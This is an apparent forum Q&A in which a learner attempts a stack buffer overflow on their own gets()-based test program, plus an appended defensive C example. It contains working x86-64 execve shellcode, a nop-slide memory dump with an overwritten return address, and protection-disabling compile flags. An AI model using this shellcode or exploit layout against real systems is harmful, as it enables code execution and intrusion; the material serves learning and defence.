
I want to do a buffer overflow exploit in the stack. For this I read in data via the "gets" function.

#include <stdio.h>

void ExploitMe()
{
  char buffer[256];
  gets(buffer); /* unbounded read: the deliberate bug */
}

int main() { ExploitMe(); return 0; }

I compile this file with

gcc test.c -o vuln -z execstack -fno-stack-protector

I want to spawn a shell with my buffer overflow. For this I implemented a nop-slide and put my opcodes to spawn this shell at the end of the nop-slide. After this, I override my return address with an address in my slide. Here is my memory:

0x7fffffffde40: 0x90909090 0x90909090 0x90909090 0x90909090
0x7fffffffde50: 0x90909090 0x90909090 0x90909090 0x90909090
0x7fffffffde60: 0x90909090 0x90909090 0x90909090 0x90909090
0x7fffffffde70: 0x90909090 0x90909090 0x90909090 0x90909090
0x7fffffffde80: 0x90909090 0x90909090 0x90909090 0x90909090
0x7fffffffde90: 0x90909090 0x90909090 0x90909090 0x90909090
0x7fffffffdea0: 0x90909090 0x90909090 0x90909090 0x90909090
0x7fffffffdeb0: 0x90909090 0x90909090 0x90909090 0x90909090
0x7fffffffdec0: 0x90909090 0x90909090 0x90909090 0x90909090
0x7fffffffded0: 0x90909090 0x90909090 0x90909090 0x90909090
0x7fffffffdee0: 0x90909090 0x90909090 0x90909090 0x90909090
0x7fffffffdef0: 0x90909090 0x90909090 0x90909090 0x90909090
0x7fffffffdf00: 0x90909090 0x90909090 0x90909090 0x90909090
0x7fffffffdf10: 0x90909090 0x2fbb4890 0x6e69622f 0x4868732f
0x7fffffffdf20: 0x5308ebc1 0x50e78948 0xe6894857 0x050f3bb0
0x7fffffffdf30: 0x42424242 0x42424242 0x42424242 0x42424242
0x7fffffffdf40: 0x42424242 0x42424242 0xffffdea0 0x00007fff

My return address is 0x00007fffffffdea0, which is an address in the middle of the nop-slide.

(I got the opcodes from the following assembler code:

0000000000000000 <__start>:
   0: 48 bb 2f 2f 62 69 6e    movabs rbx,0x68732f6e69622f2f
   7: 2f 73 68
   a: 48 c1 eb 08             shr    rbx,0x8
   e: 53                      push   rbx
   f: 48 89 e7                mov    rdi,rsp
  12: 50                      push   rax
  13: 57                      push   rdi
  14: 48 89 e6                mov    rsi,rsp
  17: b0 3b                   mov    al,0x3b
  19: 0f 05                   syscall
)

When I assemble, link and execute the assembler code, I get a shell as wanted.

When I step each instruction with gdb, an error occurs after the execution of the code to spawn a shell, but no shell is spawned.

When I execute the vulnerable program with the input as seen above outside of gdb, I get a segmentation fault.

Has anybody an idea why I can't spawn a shell inside or outside of gdb?

I used the following examples:

Liveoverflow: youtube

Arc Network Security: youtube

I use Ubuntu 16.04 and X86-64.

  • Have you disabled ASLR so that the stack will be loaded each time at the same location? Commented Jul 24, 2019 at 16:35
  • I somehow thought ASLR is turned off by compiling with "-fno-stack-protection". But ASLR is OS made and has nothing to do with compilers ^^ Thanks @bart1e for the tip! Commented Jul 24, 2019 at 18:48
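The defender's counterpart to the snippet in the question, added here as an editor's example and not code from the post: the same frame layout the gdb dump shows (a 256-byte buffer, then the saved rbp, then the return address) is read once with a gets()-style unbounded copy and once with a bounded reader, so the effect on the return-address slot can be observed in plain C without running the vulnerable binary. The frame is a plain byte array with spare room so the simulated overflow stays inside it; the 300-byte input and the sentinel value are constructed, and the function names are this example's own.

```c
#include <stdio.h>
#include <string.h>
#include <stdint.h>
#include <stddef.h>

/* Simulated layout of the ExploitMe() frame from the gdb dump:
 * buffer at offset 0 (0x...de40), saved rbp at 256 (0x...df40),
 * return address at 264 (0x...df48). SPARE keeps the simulated
 * overflow inside this array so the demonstration itself is well-defined. */
#define BUF_SIZE  256
#define RBP_OFF   BUF_SIZE
#define RET_OFF   (BUF_SIZE + 8)
#define SPARE     128
#define FRAME_LEN (RET_OFF + 8 + SPARE)

/* Unbounded copy with the semantics of gets(): stops only at a newline
 * or at the end of the input, never at the size of dst.
 * Returns the number of bytes written (excluding the NUL). */
size_t unsafe_read_line(char *dst, const char *src)
{
    size_t n = 0;
    while (src[n] != '\0' && src[n] != '\n') {
        dst[n] = src[n];
        n++;
    }
    dst[n] = '\0';
    return n;
}

/* Bounded replacement (what fgets() gives you): never writes more than cap
 * bytes, always NUL-terminates, and reports truncation so the caller can
 * reject an over-long line instead of silently continuing with a cut-off one. */
size_t safe_read_line(char *dst, size_t cap, const char *src, int *truncated)
{
    size_t n = 0;
    if (cap == 0) {
        if (truncated) *truncated = 1;
        return 0;
    }
    while (n < cap - 1 && src[n] != '\0' && src[n] != '\n') {
        dst[n] = src[n];
        n++;
    }
    dst[n] = '\0';
    if (truncated) *truncated = (src[n] != '\0' && src[n] != '\n');
    return n;
}

/* Fill the simulated frame, plant a sentinel in the return-address slot,
 * feed a constructed 300-byte line through the chosen reader and report
 * whether the slot survived. Returns 1 if intact, 0 if overwritten. */
int return_slot_intact(int use_bounded_reader)
{
    unsigned char frame[FRAME_LEN];
    char input[301];
    const uint64_t sentinel = 0x4141414141414141ULL; /* constructed marker */
    uint64_t after;

    memset(frame, 0, sizeof frame);
    memcpy(frame + RET_OFF, &sentinel, sizeof sentinel);

    memset(input, 'B', 300);   /* constructed over-long input, like the B's in the dump */
    input[300] = '\0';

    if (use_bounded_reader)
        safe_read_line((char *)frame, BUF_SIZE, input, NULL);
    else
        unsafe_read_line((char *)frame, input);

    memcpy(&after, frame + RET_OFF, sizeof after);
    return after == sentinel;
}

/* Self-check of the truncation report: a 12-character line into an
 * 8-byte buffer keeps 7 bytes, is NUL-terminated and is flagged. */
int truncation_flagged(void)
{
    char small[8];
    int truncated = 0;
    size_t n = safe_read_line(small, sizeof small, "hello world\n", &truncated);
    return truncated && n == 7 && strcmp(small, "hello w") == 0;
}

int main(void)
{
    printf("gets()-style reader, return slot intact: %d\n", return_slot_intact(0));
    printf("bounded reader,      return slot intact: %d\n", return_slot_intact(1));
    printf("truncation flagged on over-long input:  %d\n", truncation_flagged());
    return 0;
}
```

The point for a code reviewer is that the fix lives in the read, not in the build flags: -fno-stack-protector and -z execstack in the question only remove two mitigations that would otherwise detect the overwrite (the stack canary) or stop the nop-slide from executing (a non-executable stack), and ASLR, which the comments raise, is a kernel setting (/proc/sys/kernel/randomize_va_space on Linux) rather than anything the compiler controls.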
